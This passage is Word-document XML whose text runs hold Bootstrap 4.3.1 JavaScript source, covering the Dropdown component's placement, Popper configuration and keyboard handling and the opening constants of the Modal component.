        <w:t xml:space="preserve">          placement = AttachmentMap.TOPEND;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 else if ($parentDropdown.hasClass(ClassName$4.DROPRIGHT)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        placement = AttachmentMap.RIGHT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } else if ($parentDropdown.hasClass(ClassName$4.DROPLEFT)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        placement = AttachmentMap.LEFT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      } else if ($(this._menu).hasClass(ClassName$4.MENURIGHT)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        placement = AttachmentMap.BOTTOMEND;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placement;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_proto._detectNavbar = function _detectNavbar() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return $(this._element).closest('.navbar').length &gt; 0;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_proto._getOffset = function _getOffset()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var offset = {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof this._config.offset === 'function') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        offset.fn = function (data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data.offsets = _objectSpread({}, data.offsets, _this2._config.offset(data.offsets, _this2._element) || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return data;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        };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offset.offset = this._config.offset;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      return offset;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_proto._getPopperConfig = function _getPopperConfig() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var popperConfig = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        placement: this._getPlacement(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        modifiers: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          offset: this._getOffset(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          flip: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            enabled: this._config.flip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          preventOverflow: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            boundariesElement: this._config.boundary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 // Disable Popper.js if we have a static display</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/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if (this._config.display === 'static') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        popperConfig.modifiers.applyStyle = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          enabled: false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        };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popperConfig;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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Dropdown._jQueryInterface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$(this).data(DATA_KEY$4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = typeof config === 'object' ? config : null;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Dropdown(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$4,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Dropdown._clearMenus = function _clearMenus(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (event &amp;&amp; (event.which === RIGHT_MOUSE_BUTTON_WHICH || event.type === 'keyup' &amp;&amp; event.which !== TAB_KEYCODE))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toggles = [].slice.call(document.querySelectorAll(Selector$4.DATA_TOGGLE));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      for (var i = 0, len = toggles.length; i &lt; len; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var parent = Dropdown._getParentFromElement(toggles[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var context = $(toggles[i]).data(DATA_KEY$4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var relatedTarget = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          relatedTarget: toggles[i]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (event &amp;&amp; event.type === 'click') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          relatedTarget.clickEvent = event;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(!context) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          continue;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dropdownMenu = context._menu;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!$(parent).hasClass(ClassName$4.SHOW)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          continue;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(event &amp;&amp; (event.type === 'click' &amp;&amp; /input|textarea/i.test(event.target.tagName) || event.type === 'keyup' &amp;&amp; event.which === TAB_KEYCODE) &amp;&amp; $.contains(parent, event.target)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          continue;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hideEvent = $.Event(Event$4.HIDE, relatedTarget);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(parent).trigger(hideEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (hideEvent.isDefaultPrevented()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } // If this is a touch-enabled device we remove the extra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // empty mouseover listeners we added for iOS support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  if ('ontouchstart' in document.documentElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(document.body).children().off('mouseover', null, $.noop);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toggles[i].setAttribute('aria-expanded', 'false');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(dropdownMenu).removeClass(ClassName$4.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(parent).removeClass(ClassName$4.SHOW).trigger($.Event(Event$4.HIDDEN, relatedTarget));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Dropdown._getParentFromElement = function _getParentFromElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var parent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var selector = Util.getSelectorFromElement(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        parent = document.querySelector(selector);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parent || element.parentNode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    } // eslint-disable-next-line complexity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Dropdown._dataApiKeydownHandler = function _dataApiKeydownHandler(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // If not input/textarea:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      //  - And not a key in REGEXP_KEYDOWN =&gt; not a dropdown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // If input/textarea:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      //  - If space key =&gt; not a dropdown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      //  - If key is other than escape</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      //    - If key is not up or down =&gt; not a dropdown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      //    - If trigger inside the menu =&gt; not a dropdown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (/input|textarea/i.test(event.target.tagName) ? event.which === SPACE_KEYCODE || event.which !== ESCAPE_KEYCODE &amp;&amp; (event.which !== ARROW_DOWN_KEYCODE &amp;&amp; event.which !== ARROW_UP_KEYCODE || $(event.target).closest(Selector$4.MENU).length) : !REGEXP_KEYDOWN.test(event.which))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event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      event.stopPropagation();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.disabled || $(this).hasClass(ClassName$4.DISABLED))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parent = Dropdown._getParentFromElement(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isActive = $(parent).hasClass(ClassName$4.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!isActive || isActive &amp;&amp; (event.which === ESCAPE_KEYCODE || event.which === SPACE_KEYCODE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (event.which === ESCAPE_KEYCODE) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var toggle = parent.querySelector(Selector$4.DATA_TOGGLE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(toggle).trigger('focus');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$(this).trigger('click');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items = [].slice.call(parent.querySelectorAll(Selector$4.VISIBLE_ITEMS));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (items.length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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index = items.indexOf(event.target);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (event.which === ARROW_UP_KEYCODE &amp;&amp; index &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        index--;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(event.which === ARROW_DOWN_KEYCODE &amp;&amp; index &lt; items.length - 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        index++;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(index &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        index = 0;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items[index].focus();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_createClass(Dropdown,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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return VERSION$4;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Default$2;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"DefaultType",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DefaultType$2;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Dropdown;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$(document).on(Event$4.KEYDOWN_DATA_API, Selector$4.DATA_TOGGLE, Dropdown._dataApiKeydownHandler).on(Event$4.KEYDOWN_DATA_API, Selector$4.MENU, Dropdown._dataApiKeydownHandler).on(Event$4.CLICK_DATA_API + " " + Event$4.KEYUP_DATA_API, Dropdown._clearMenus).on(Event$4.CLICK_DATA_API, Selector$4.DATA_TOGGLE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    event.stopPropagation();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    Dropdown._jQueryInterface.call($(this), 'toggle');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }).on(Event$4.CLICK_DATA_API, Selector$4.FORM_CHILD, function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    e.stopPropagation();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$.fn[NAME$4] = Dropdown._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$4].Constructor = Dropdown;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$4].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$4] = JQUERY_NO_CONFLICT$4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Dropdown._jQueryInterface;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var NAME$5 = 'modal';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$5 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$5 = 'bs.modal';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$5 = "." + DATA_KEY$5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$5 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$5 = $.fn[NAME$5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ESCAPE_KEYCODE$1 = 27; // KeyboardEvent.which value for Escape (Esc) key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Default$3 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    backdrop: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    keyboard: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    focus: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    show: true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DefaultType$3 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    backdrop: '(boolean|string)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    keyboard: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    focus: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    show: 'boolean'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Event$5 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUSIN: "focusin" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    RESIZE: "resize" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DISMISS: "click.dismiss" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    KEYDOWN_DISMISS: "keydown.dismiss" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSEUP_DISMISS: "mouseup.dismiss" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSEDOWN_DISMISS: "mousedown.dismiss" + EVENT_KEY$5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY$5 + DATA_API_KEY$5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ClassName$5 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SCROLLABLE: 'modal-dialog-scrollable',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SCROLLBAR_MEASURER: 'modal-scrollbar-measure',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    BACKDROP: 'modal-backdrop',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    OPEN: 'modal-open',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FADE: 'fade',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show'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Selector$5 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DIALOG: '.modal-dialog',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MODAL_BODY: '.modal-body',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_TOGGLE: '[data-toggle="modal"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_DISMISS: '[data-dismiss="modal"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
